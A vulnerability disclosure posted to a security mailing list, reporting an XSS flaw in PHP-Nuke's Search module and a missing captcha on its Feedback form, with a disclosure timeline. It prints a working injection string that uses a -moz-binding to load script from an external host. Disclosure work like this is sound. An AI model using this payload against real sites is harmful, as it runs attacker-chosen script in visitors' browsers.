Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in PHP-Nuke. SecurityVulns ID: 11343. ------------------------- Affected products: ------------------------- Vulnerable are PHP-Nuke 8.1 and previous versions. Tested in PHP-Nuke 8.0 and 8.1. ---------- Details: ---------- XSS (WASC-08): POST request at page http://site/modules.php?name=Search " style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss') In search field. This is version for Mozilla and Firefox (before 3.0), with using of MouseOverJacking it's possible to make version for all browsers. Insufficient Anti-automation (WASC-21): http://site/modules.php?name=Feedback In the form there is no protection from automated requests (captcha). ------------ Timeline: ------------ 2010.10.28 - announced at my site. 2010.10.29 - informed developers. 2011.01.11 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4645/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua